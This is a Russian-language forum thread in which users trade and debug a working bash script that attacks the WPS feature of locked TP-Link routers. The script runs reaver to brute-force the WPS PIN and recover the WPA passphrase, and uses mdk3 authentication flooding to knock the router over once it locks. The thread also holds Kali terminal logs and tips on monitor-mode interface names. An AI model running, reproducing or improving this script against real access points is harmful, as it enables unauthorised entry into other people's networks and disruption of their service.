Уязвимость в протоколе Wi-Fi Protected Setup

Затёр, но тоже не помогло. Жаль, что бесполезные скрипты, не работает ни один, ни второй.

 

Другого нет И проблема в том, что просто на всех (штук 5 попробовал) такое сообщение

 

Добрый вечер,у меня такая проблема точка лоченая TP-Link. Поместил папку со скриптом в домашнюю папку,далее вот...
root@kali:~# airmon-ng

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
phy2 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

root@kali:~# airmon-ng start wlan1


PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
phy2 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
(mac80211 station mode vif disabled for [phy2]wlan1)

root@kali:~# cd TpLink/
root@kali:~/TpLink# chmod +x TpLink.sh
root@kali:~/TpLink# ./TpLink.sh 84:16:F9:9D:07:7A wlan1mon
./tmp/84:16:F9:9D:07:7A
BSSID = 84:16:F9:9D:07:7A
[+] reaver is working ...
[-] Failed to retrieve a MAC address for interface 'mon0'!
[-] not associated
[-] not associated
[-] not associated

и так без конца,может я что то не так сделал? Меня смущает [-] Failed to retrieve a MAC address for interface 'mon0'!
Помогите кто чем может.

 

Смени на wlan1mon. Если не знаешь, вот

Spoiler: скрипт

Code:

#!/bin/bash

BSSID=$1
WPSPIN=""
WPAPSK=""
name_interface=$2
Work_reaver=20
tmp_path=`dirname $0`/tmp/$BSSID
echo $tmp_path


print_example (){
echo "Example usage: TpLink.sh BSSID interface";
echo "Example usage: TpLink.sh FF:FF:FF:FF:FF:FF wlan0mon";
}


if [ "$1" == "" ]
  then
  print_example
  exit 1
  fi
if [ "$2" == "" ]
  then
  echo "No interface, using wlan1mon"
  name_interface="wlan1mon"
  fi
echo "BSSID = $BSSID"
echo "Interface = $name_interface"
#echo "" > "$tmp_path.txt"



trap 'echo "Wait exit reaver"; kill_reaver; exit 1' 2

kill_reaver (){
killall -s INT -w reaver;
}

run_MDK3 (){
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 $name_interface a -a $BSSID -m"
sleep 6
killall mdk3 2> /dev/null
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
sleep 5
}

wait_associated (){
Ass=""
while [ "$Ass" == "" ]
do
sleep 2
Ass=`grep "Associated with" "$tmp_path.txt"`
  if [ "$Ass" == "" ]
  then echo [-] not associated
  else echo $Ass
  fi
done

}

while [ "$WPSPIN" == "" ]
do
echo [+] reaver is working ...
echo "" > $tmp_path.txt
reaver -i $name_interface -b $BSSID -n -v -L -s "$tmp_path.wpc" > "$tmp_path.txt" &
ReaverID=$!
disown $ReaverID  

wait_associated

for (( counter=1; counter<$Work_reaver; counter++ ))
   do
    sleep 2
   if [ "$WPSPIN" == "" ]
  then
    WPSPIN=`grep "WPS PIN" "$tmp_path.txt"`
    WPAPSK=`grep "WPA PSK" "$tmp_path.txt"`
   else break
   fi
   done

TRYPIN=`grep "Trying pin" "$tmp_path.txt" | grep -oE "[[:digit:]]{8}"`

echo "Pins"
echo "$TRYPIN"

kill_reaver

# Run mdk3 to work ...
if [ "$WPSPIN" == "" ]
then run_MDK3
fi
done

echo "[+] Done..."
echo "$WPSPIN"
echo "$WPAPSK"
echo to interrupt script [Ctrl+C]
while true
do
sleep 3
done

Запускай вот так - TpLink.sh BSSID interface
ps добавил возможность выбора интерфейса, чтобы руками не менять каждый раз

 

Скрипт ReVdk не работает на Kali linux версии выше 1.0 так как airmon-ng был пере патрашен... этот скрипт работает и уже присутствует в сборках Wislax

 

Странно, а на сайте есть версия r3 для кали 2 (знаю то,что уже 2016 есть, но всё же)

 

Для чего вообще нужны эти скрипты если ими нельзя подключитя ни к одной залоченной точке доступа? Типа если заблокируется, nо md3 якобы снимет блокировку? Честно говоря, ещё ни разу не видел ни одного нового роутера который бы хоть как-то реагировал на эту штуку. Да и если надо руками запустить атаку не проблема ведь, смысла в этом только нет...

 

Я 2-3 года назад спокойно дудосил свой роутер, интернет на нём пропадал. (а может даже и перезагружался)
PS mdk3. Да и скрипта, который всё взломает тоже нет

 

Это ещё хорошо если из 10 маршрутизаторов 1 такой попадётся. У меня из примерно 10 роутров рядом эта mdk3 вообще до лампочки.

 

Лично у меня половина роутеров с WPS падает (pixie+3wifi) и без всяких mdk3.

 

Там печенька вот в чем в старой верси кали airmon-ng воспринимал mon0 в новой же кали виртуальный интерфес обозначается как wlan0mon а скрипт написан под mon0 вот и все дела ставь на виртуалку Kali linux и wislax и всего делов то ....

 

Проще скрипт переписать / доработать до поддержки двух типов интерфейсов.

 

Ну хорошо, давайте доведем до ума , у меня залип на стадии атаки mdk3 - а должен работать 6 секунд.
Жалуется на терминал в пути Desktop/ Если возьмемся сделаем.

 

завтра проверю на другом tp-link

 

Зачем это всё? Он у вас спросит какой интерфейс юзать ("Which wireless interface you will be using? e.g wlan0, wlan0mon etc:"), пишите "wlan0mon" (предварительно выполнив "airmon-ng start wlan0") и будет счастье
UPD: на 3 запуске сломался XD

 

Всем привет, что то я не понял в чем прикол этого скрипта ? Сегодня тестил его на Tplink, точка заблокировалась после перебора трех-пяти пинов.

 

После блокировки он должен положить роутер, чтобы продолжить подбор

 

понял, завтра буду дальше пробовать

 

вы походу не поняли. скрипт ждет что будет создан виртуальный интерфейс mon0 а по факту у вас он будет называться wlan0mon.
скрипт не поймет этого...его нужно перелопатить имено под wlan0mon... гдето в инете есть скрипт переделанный ,но найти я его второй раз не смог

 

Может 3 версия и есть тот самый скрипт? Просто у меня он как-то запустился XD
PS я про то,что там можно указать имя интерфейса